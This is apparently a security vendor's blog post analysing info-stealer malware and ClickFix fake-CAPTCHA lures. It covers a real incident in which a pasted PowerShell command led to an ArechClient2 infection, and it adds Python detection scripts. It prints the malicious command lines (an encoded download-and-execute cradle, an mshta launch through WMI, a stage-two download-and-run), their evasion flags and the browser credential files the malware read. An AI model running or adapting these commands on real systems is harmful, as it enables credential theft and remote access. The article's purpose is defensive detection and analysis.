
Click, Copy, Compromise

Demystifying Info Stealers

Long before a breach makes headlines, info stealers are already at work—silently siphoning credentials, session cookies, and other sensitive data, fueling the underground economy of cybercrime.

This type of malware isn't just a threat to individual users; it endangers organizations worldwide, across every sector. This article sheds light on current info stealer trends and provides actionable steps to help your organization safeguard its users and data.


What is Info Stealer Malware?

At their core, info stealers are stealthy data harvesters. They infiltrate systems through phishing, malicious downloads, or compromised software and silently extract credentials, financial information, and personal data such as autofill form entries and browser history. In one way or another, the user is usually tricked into allowing the stealer to run on their machine. What the attacker is after is resale value: compromised credentials and session cookies that grant initial access to corporate environments, material for blackmail, and stolen data that can be sold for profit.

Info stealers are often categorized by how they execute, but the key differences lie in how they evade detection and deliver their payloads, not in their core functionality. Some are embedded in malicious files, such as tampered software or phishing attachments, while others rely on script-based execution through PowerShell, Windows Management Instrumentation (WMI), or JavaScript loaders to reduce their footprint on disk and evade detection. Others specifically target browsers, injecting malicious extensions or hijacking active sessions. Regardless of the delivery mechanism, the end goal remains the same: silently harvesting sensitive information for financial or strategic gain.


Trends

According to AnyRun’s Top Malware Types in 2024 report, stealers ranked as the number one sandboxed malware threat by upload volume [1]. In 2023, stealers held the second-place position with 18,290 detections, but surged to the top in 2024 with 51,291 detections—a staggering 180% increase year over year.

While “stealer” in this context refers to a broad category of malware, the key takeaway remains clear: attackers are increasingly focused on stealing user data. This trend is echoed by other threat intelligence providers—Recorded Future, for instance, also reported that infostealers accounted for the highest number of infections throughout 2024 [2].

In late December 2024, a large-scale compromise of more than 30 Chrome browser extensions came to light, an activity cluster Red Canary tracks as Infrared Ibis in its February 2025 Intelligence Insights [3]. Millions of users were affected by a campaign that began with phishing and ended in a browser-based stealer. That campaign set the tone for the rapid evolution we continue to see at Cyderes: phishing and malvertising campaigns that trick users into running a PowerShell command on their own machines, leading to compromise if not mitigated.


Understanding the Attack Chain

In Cyderes’ recent analysis of stealer malware campaigns, we’ve observed a consistent attack pattern. Typically, a user is lured into clicking a malicious link delivered via phishing, malvertising, or a compromised third-party site. The campaign then escalates through social engineering, where the user is subtly guided into executing a malicious script. Once the payload is run, as we’ll show in a later example, it initiates command-and-control (C2) communications, followed by data collection and exfiltration.

These attacks rely on creative social engineering to manipulate users into unwittingly executing malicious code. One such method is the increasingly popular ClickFix technique, a name coined by Proofpoint. Whether the lure is a fake CAPTCHA, a broken web page, or a bogus error message, the pattern is the same: the user's own keystrokes are the trigger for infection, which is why both user awareness and behavior-based detection matter.


ClickFix: A Common Tactic in Info Stealer Campaigns
ClickFix is a social engineering technique in which the user is presented with a manufactured "problem" that demands immediate action, such as a fake reCAPTCHA error, a browser issue, or a software failure. The "fix" is a short sequence of keystrokes the page walks the user through: typically Win+R to open the Windows Run dialog, Ctrl+V to paste a command the page has already placed on the clipboard, and Enter to run it. The pasted command launches PowerShell or mshta.exe and, with it, the attack; the same trick is also used with a terminal window instead of the Run dialog.

An example of a simulated ClickFix attack can be found below and in John Hammond’s reCAPTCHA Phish GitHub repository [4], which mimics a CAPTCHA loop and walks users through running malicious code. 

[Screenshots: the simulated reCAPTCHA ClickFix page and the copy-and-paste instructions it shows the user]

Below are two command-line payloads that Cyderes has observed in the wild, typically used to stage second-level scripts and escalate the attack:

Observed Payload Variants

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$l='hxxps://example[.]com/rubdubfunong.m4a';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ''I am not a robot: CAPTCHA Verification UID: 7811''

"C:\WINDOWS\system32\mshta.exe" hxxps://example[.]com/s5a.mp3 # ''I am not a robot - reCAPTCHA Verification ID: 2165''

Three details in these one-liners are worth calling out. The trailing "# ''I am not a robot ...''" text is a comment to PowerShell and an ignored extra argument to mshta.exe, so it is never executed, but it is the last thing the user sees in the text they pasted, which keeps the Run dialog looking like a verification step. The string concatenation 'ms' + 'hta' + '.exe' only becomes mshta.exe at run time, which defeats naive keyword matching on the command line. And launching mshta.exe through Invoke-CimMethod against the Win32_Process class means the new process is created by the WMI provider host (WmiPrvSE.exe) rather than by the user's PowerShell, so a detection keyed on a powershell.exe to mshta.exe parent-child relationship never sees it. The .m4a and .mp3 extensions are cosmetic: mshta.exe executes whatever HTML Application content the URL returns, regardless of the file name.


Cyderes Detection Engineering, notably Gus Nelson and Patryk Zochowski, has implemented additional detection logic for obfuscated payloads of this kind, including homoglyph abuse, where visually similar Unicode characters are substituted into a command so that simple string matching fails.


Observed Threat Activity: Malware via a Trusted Vendor Site

In a real-world case, Cyderes investigated a stealer malware campaign delivered through a compromised third-party vendor site. The attackers exploited the legitimacy of a trusted website to distribute a malicious payload.

While there was no definitive evidence of a ClickFix-style prompt in this case, the behavior closely mirrored that pattern. The attack relied on user interaction—likely involving manual pasting into the Windows Run dialog—to execute a PowerShell command copied to the user's clipboard. This script appeared to initiate the next phase of the infection chain.

The observed first-stage command was Base64-encoded and used several common evasion flags. The PowerShell arguments executed by the user were:


Example

-win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADYAMQAuADEANQA5AC4AMQA0AC8AdAAvAHMAYQB3ACcAKQAgAHwAIABJAEUAeAA=

Decoded

(New-Object Net.WebClient).DownloadString('hxxp://45.61.159[.]14/t/saw') | IEx

  • -win 1: Short for -WindowStyle; the value 1 means Hidden, so the PowerShell window never appears to the user.

  • -ep bypass: Short for -ExecutionPolicy; bypasses any script execution policy in place. The execution policy is a safety feature, not a security boundary, and any user can override it this way.

  • -noni: Short for -NonInteractive; disables interactive prompts so nothing can block execution.

  • -enc: Short for -EncodedCommand; takes a Base64 string that decodes to UTF-16LE PowerShell, which is why the encoded form is roughly twice the length of the decoded command. powershell.exe also accepts the shorter spellings -e and -ec, so detection logic should not key on the exact string -enc.

DownloadString fetches the script body at that URL into memory as a string and IEx (Invoke-Expression) executes it directly, so at this stage nothing is written to disk. The downloaded script was:

Invoke-WebRequest -Uri "hxxps://stable-connect-activity[.]help/new-york/amazing" -OutFile "$env:TEMP\Monday.zip"; Expand-Archive -Path "$env:TEMP\Monday.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\Flowers\photomap.exe"

The stable-connect-activity domain served a malicious archive named 'hw_update.zip', which downloads automatically when the URL is visited directly. Invoke-WebRequest saves that payload as 'Monday.zip' in the user's temp directory, Expand-Archive unpacks it there, and the call operator (&) runs the extracted 'photomap.exe' from the 'Flowers' subdirectory with no confirmation or integrity check. Because this second stage does write to disk, the archive and executable hashes listed in the IOCs section are usable for file-based detection even though the first stage was fileless.

Further analysis of the process tree showed the following:

[Figure: process tree of the infection chain, from the user's PowerShell through photomap.exe to MSBuild.exe]


Once 'photomap.exe' is executed, it appears to activate a Remote Access Trojan (RAT) and at the same time launches 'MSBuild.exe', which then begins communicating with an IP address geolocated in Moscow, Russia and allocated to a Hong Kong-registered organization, Chang Way Technologies Co. Limited (AS207566). MSBuild.exe is a signed Microsoft binary, so network activity from it blends in with legitimate developer tooling. Although the Pastebin URL observed in this case is no longer active, it likely served as a staging point for additional command-and-control instructions, an approach also documented in dr4k0nia's in-depth analysis of a similar ArechClient2 sample [5].

When executed in a sandbox, photomap.exe accessed sensitive files and folders on the machine, such as:

  • \User Data\Default\Network\Cookies
  • Chrome\User Data\Default\Session Storage
  • Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies
  • Firefox\Profiles\...\cookies.sqlite-wal
  • Firefox\Profiles\...\permissions.sqlite
  • Firefox\Profiles\...\cert9.db, cert9.db-journal
  • Firefox\Profiles\...\storage.sqlite, storage.sqlite-journal
  • Firefox\Profiles\...\protections.sqlite-journal
  • Firefox\Profiles\...\SiteSecurityServiceState.bin
  • Firefox\Profiles\...\AlternateServices.bin
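The list above is exactly the kind of behavior the Defense and Mitigation section argues defenders should detect: a freshly dropped executable reading cookie, session and certificate stores that only the browser has any business opening. The following Python is an added example (not Cyderes' tooling or detection content) of that check. The file-access records are constructed from the sandbox list above plus benign browser self-access; the Chromium "Login Data" and "Local State" and Firefox logins.json/key4.db patterns are taken from the standard profile layouts and are not in the sandbox output. It assumes a telemetry source that reports the opening process and the file path, such as EDR file-access telemetry or a sandbox report.

```python
"""Flag processes other than the owning browser that open browser cookie, credential and session stores."""
import re

# (browser family, store kind, regex over the lower-cased full path)
STORE_PATTERNS = [
    ("chromium", "cookies", re.compile(r"\\user data\\[^\\]+\\(?:network\\)?cookies$")),
    ("chromium", "saved_logins", re.compile(r"\\user data\\[^\\]+\\login data$")),
    ("chromium", "session_storage", re.compile(r"\\user data\\[^\\]+\\session storage\\")),
    ("chromium", "master_key", re.compile(r"\\user data\\local state$")),
    ("firefox", "cookies", re.compile(r"\\profiles\\[^\\]+\\cookies\.sqlite(?:-wal|-journal)?$")),
    ("firefox", "saved_logins", re.compile(r"\\profiles\\[^\\]+\\(?:logins\.json|key4\.db)$")),
    ("firefox", "cert_store", re.compile(r"\\profiles\\[^\\]+\\cert9\.db(?:-journal)?$")),
    ("firefox", "site_storage", re.compile(r"\\profiles\\[^\\]+\\storage\.sqlite(?:-journal)?$")),
]
# Processes expected to open each family's profile; anything else touching a store is reported.
OWNING_PROCESSES = {
    "chromium": {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"},
    "firefox": {"firefox.exe"},
}


def classify_store(path):
    """Return (family, store_kind) when the path is a known browser secret store, else None."""
    low = path.lower()
    for family, kind, rx in STORE_PATTERNS:
        if rx.search(low):
            return family, kind
    return None


def detect_store_access(events):
    """events: iterable of {"image": <process path>, "path": <file opened>} records.

    Returns one alert per non-browser process that touched a store. Severity is "high" when the
    process reached cookies or saved logins (the data stealer markets trade in) or spanned more
    than one browser family, which a single legitimate tool rarely does.
    """
    touched = {}
    for ev in events:
        hit = classify_store(ev["path"])
        if hit is None:
            continue
        family, kind = hit
        proc = ev["image"].lower().rsplit("\\", 1)[-1]
        if proc in OWNING_PROCESSES[family]:
            continue  # a browser reading its own profile is normal
        touched.setdefault(proc, set()).add((family, kind))

    alerts = []
    for proc, stores in sorted(touched.items()):
        families = {fam for fam, _ in stores}
        kinds = {kind for _, kind in stores}
        high = bool(kinds & {"cookies", "saved_logins"}) or len(families) > 1
        alerts.append({"process": proc, "severity": "high" if high else "medium", "stores": sorted(stores)})
    return alerts


# Constructed sample telemetry: the paths photomap.exe touched in the sandbox run, benign browser
# self-access, and an unrelated file open that must not alert. Paths are assumed, not captured.
STEALER = r"C:\Users\victim\AppData\Local\Temp\Flowers\photomap.exe"
CHROME = r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default"
FIREFOX = r"C:\Users\victim\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release"
SAMPLE_EVENTS = [
    {"image": STEALER, "path": CHROME + r"\Network\Cookies"},
    {"image": STEALER, "path": CHROME + r"\Session Storage\000003.log"},
    {"image": STEALER, "path": FIREFOX + r"\cookies.sqlite-wal"},
    {"image": STEALER, "path": FIREFOX + r"\cert9.db"},
    {"image": STEALER, "path": FIREFOX + r"\storage.sqlite"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "path": CHROME + r"\Network\Cookies"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "path": FIREFOX + r"\cookies.sqlite"},
    {"image": r"C:\Windows\explorer.exe", "path": r"C:\Users\victim\Desktop\notes.txt"},
]

if __name__ == "__main__":
    for alert in detect_store_access(SAMPLE_EVENTS):
        print(alert)
```

Tune OWNING_PROCESSES to your estate: backup agents, profile-sync tools and some password managers legitimately open these files, and they belong on the allowlist rather than in an alert queue. The cross-family signal (one process reading both Chrome and Firefox profiles) is the part worth keeping even after tuning, because it matches how stealers enumerate every browser they know about.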

This malware was not only an info stealer but also a remote access trojan, consistent with ArechClient2 (also tracked as SectopRAT), a .NET RAT with numerous capabilities and stealth functions, including the ability to profile victim systems, steal information, and launch a hidden secondary desktop to control browser sessions, according to Malpedia [6].

The ClickFix method and the observed malware behavior illustrate core components of how info stealer campaigns unfold.


Defense and Mitigation

Why Info Stealers Often Go Undetected

One of the most concerning aspects of info stealer malware is its ability to slip past traditional detection. Many modern stealers are fileless in their early stages, relying on living-off-the-land binaries such as PowerShell, MSBuild, or mshta.exe to run in memory, which defeats legacy antivirus that depends on file-based signatures. In addition, attackers encode payloads in Base64 or obfuscate commands with homoglyphs and string concatenation to evade keyword matching and sandbox analysis.

The modular nature of many stealers also lets threat actors customize payloads for specific targets or campaigns. Some variants include browser-specific modules for credentials stored in Chrome, Firefox, or Edge, while others add functionality to steal cryptocurrency wallets, clipboard contents, or MFA backup codes.

With evasive techniques becoming standard, defenders must shift toward behavior-based detections, anomaly spotting and proactive threat hunting to stay ahead of these threats.


Detection Strategies and Proactive Defense Tactics

Given the stealthy and rapidly evolving nature of the info stealer threats, adopting proactive measures is essential to protect your organizational assets. Cyderes recommends the following best practices: 

  • Deploy advanced EDR solutions capable of behavior-based detections to uncover and isolate suspicious activities at the early stages of an attack.

    • While EDRs may flag and report threats as 'mitigated' or 'prevented', the reality is that many info stealers still slip through, making robust detection logic and layered defenses critical to closing the gap between an alert and actual prevention.

  • Continuous education campaigns and simulated phishing exercises significantly reduce the likelihood of successful social engineering attacks that lead to initial compromise.

  • Utilize timely and actionable threat intelligence to keep defenses updated against the latest info stealer threats and indicators of compromise.

To support a layered defense strategy, the following techniques combined with Windows Event IDs can help identify suspicious behaviors associated with info stealers. These are just a few examples—there are numerous options for implementing effective detections depending on your environment, tools, and threat landscape: 


Execution (Common in ClickFix attacks)

  • Windows Event ID 4104 (Microsoft-Windows-PowerShell/Operational) – Logs PowerShell script block execution. Script Block Logging must be enabled by policy; once it is, the logged block is the decoded script, so an -EncodedCommand payload appears here in clear text. Look for download cradles, Invoke-Expression, and external domains or IP addresses.

  • Windows Event ID 4688 (Security) – Tracks process creation. Enable "Include command line in process creation events" or the command line field is empty. Monitor for suspicious parent-child relationships, such as explorer.exe spawning powershell.exe or mshta.exe, which is what a command pasted into the Run dialog looks like; note that a process created through WMI (Win32_Process Create) shows WmiPrvSE.exe as its parent instead.

  • Sysmon Event ID 1 (Process creation) – Provides the parent process, command line and file hashes in a single record and is the preferred source where Sysmon is deployed.

  • Detect use of flags like -enc (and the shorter -e and -ec spellings), -ExecutionPolicy Bypass, -WindowStyle Hidden, and suspicious DownloadString or Invoke-WebRequest commands, including after normalizing string concatenation such as 'ms' + 'hta'.

  • Hunt the Run dialog history itself: commands entered via Win+R are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a PowerShell or mshta command line there is a strong ClickFix indicator even on hosts where command-line logging was not enabled at the time.
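The command-line checks in the list above, and the decoding walked through in the Example and Decoded sections earlier, as an added example that is not part of the original article or Cyderes' detection content. It is Python over constructed process-creation records (the shape a 4688 or Sysmon Event ID 1 collector would emit) built from the command lines quoted in this article; the parent/image fields and the benign fourth record are assumed. It decodes the -EncodedCommand argument the same way the Decoded section does, merges concatenated strings so 'ms' + 'hta' matches as mshta, scores the flags and download cradles discussed above, and pulls URLs out of both the raw and the decoded text:

```python
"""Triage Windows process-creation records for ClickFix-style PowerShell and mshta launches."""
import base64
import binascii
import re

# powershell.exe accepts shortened spellings of -EncodedCommand (-e, -ec, -enc, ...), so match every
# prefix of the parameter name, longest first, and capture the Base64 token that follows it.
_ENC_FLAGS = sorted({"encodedcommand"[:i] for i in range(1, 15)}, key=len, reverse=True)
ENC_RE = re.compile(r"-(?:" + "|".join(_ENC_FLAGS) + r")\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# 'ms' + 'hta' + '.exe' -> 'mshta.exe': quoted fragments joined with + are merged before matching.
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
# hxxp is accepted so defanged samples copied from reports replay through the same logic.
URL_RE = re.compile(r"(?:hxxps?|https?)://[^\s'\"()]+", re.IGNORECASE)

# (finding, weight, regex applied to the normalized command line and to the decoded payload)
INDICATORS = [
    ("hidden_window", 1, r"-w[a-z]*\s+(?:1|hidden)\b"),                 # -w 1 / -win 1 / -WindowStyle Hidden
    ("execution_policy_bypass", 1, r"-e[a-z]*\s+(?:bypass|unrestricted)\b"),
    ("non_interactive", 1, r"-non[a-z]*\b"),
    ("download_cradle", 2, r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b"),
    ("invoke_expression", 2, r"\biex\b|invoke-expression"),
    ("mshta_reference", 2, r"mshta"),
    ("mshta_url", 3, r"""mshta(?:\.exe)?["']?\s+["']?(?:hxxps?|https?)://"""),
    ("wmi_process_create", 2, r"invoke-(?:cim|wmi)method[^|;]*win32_process"),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
THRESHOLD = 3  # explorer.exe -> powershell.exe alone (score 1) is normal; more must stack before alerting


def decode_encoded_command(cmdline):
    """Return the UTF-16LE PowerShell behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def normalize(text):
    """Lower-case and merge string concatenation so split keywords such as 'ms'+'hta' become matchable."""
    while True:
        merged = CONCAT_RE.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), text)
        if merged == text:
            return text.lower()
        text = merged


def triage(event):
    """Score one process-creation record and return its findings, decoded payload, URLs and verdict."""
    raw = event["command_line"]
    decoded = decode_encoded_command(raw)
    findings = {"encoded_command": 2} if decoded is not None else {}
    for text in (normalize(raw), normalize(decoded or "")):
        for name, weight, pattern in INDICATORS:
            if re.search(pattern, text):
                findings[name] = weight
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if parent == "explorer.exe" and image in SCRIPT_HOSTS:
        findings["script_host_from_explorer"] = 1  # what a command pasted into the Run dialog looks like
    score = sum(findings.values())
    return {"image": image, "score": score, "verdict": "suspicious" if score >= THRESHOLD else "benign",
            "findings": findings, "decoded": decoded,
            "urls": sorted(set(URL_RE.findall(raw + " " + (decoded or ""))))}


def triage_all(events):
    return [triage(e) for e in events]


# Constructed records: the three command lines quoted in this article (URLs left defanged, full
# paths shortened) plus one benign scripted launch. Parent and image fields are assumed.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"""powershell.exe -w 1 -C "$l='hxxps://example[.]com/rubdubfunong.m4a';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ''I am not a robot: CAPTCHA Verification UID: 7811''"""},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'''"C:\WINDOWS\system32\mshta.exe" hxxps://example[.]com/s5a.mp3 # ''I am not a robot - reCAPTCHA Verification ID: 2165'''},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADYAMQAuADEANQA5AC4AMQA0AC8AdAAvAHMAYQB3ACcAKQAgAHwAIABJAEUAeAA="},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for result in triage_all(SAMPLE_EVENTS):
        print(result["image"], result["verdict"], result["score"], sorted(result["findings"]), result["urls"])
```

The weights and threshold are illustrative and should be tuned against your own baseline; the point of scoring rather than matching a single string is that each of these payloads trips several independent indicators while an administrator's scripted launch trips one. Note that the first record never produces a mshta_url finding because the URL is held in a variable, but the WMI Win32_Process call and the de-concatenated mshta reference still carry it over the threshold. Where Script Block Logging (Event ID 4104) is on, the decoded text arrives already decoded and the same indicator list can be run on it directly.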

By implementing additional detection mechanisms and correlating them with threat intelligence and known IOCs, you can detect and stop info stealer activity before data is exfiltrated, a broader compromise begins, or user credentials are sold on the dark web.


About Cyderes

At Cyderes, we understand the complexities of today's evolving threat landscape and the critical importance of safeguarding your digital assets. Our mission goes beyond simply responding to threats: we proactively partner with organizations to deliver comprehensive, intelligence-driven cybersecurity solutions tailored to your unique needs.

Through our managed detection and response (MDR) services, industry-leading threat intelligence, and cutting-edge cybersecurity practices, Cyderes equips organizations to rapidly identify, contain, and eradicate threats. Our expert teams provide continuous monitoring, threat hunting, and incident response capabilities, ensuring your defenses are ready every day.

Join forces with Cyderes to empower your organization against cyber threats, securing your data and reputation. Together, we turn cybersecurity into your competitive advantage.



Contributors

Jonathan Waknin
Director, Threat Management

Ruben Huerta
Principal Security Analyst

Cameron Walker
Principal Security Analyst


References

[1] https://any.run/cybersecurity-blog/malware-trends-2024/

[2] https://www.recordedfuture.com/research/2024-malicious-infrastructure-report

[3] https://redcanary.com/blog/threat-intelligence/intelligence-insights-february-2025/

[4] https://github.com/JohnHammond/recaptcha-phish

[5] https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/

[6] https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat


IOCs

  • Monday.zip - 0778a8c82e069614de1cca17660dd40881dea345ad0954a3e31492304edb9251

  • hw_update.zip - acd1daa8455dd84d7d50714303c957cb673c5b5cb1e52e507cbb043a296c205b

  • photomap.exe - 8fa9074cd74cbcedc44b12999dbc5f4e51ea82caa24be18b073686229f1f9db8

  • 104.21.96[.]1

  • 92.255.85[.]36

  • hxxp://45.61.159[.]14/t/saw

  • pastebin[.]com/raw/DWCCqGB0wKo+g

  • stable-connect-activity[.]help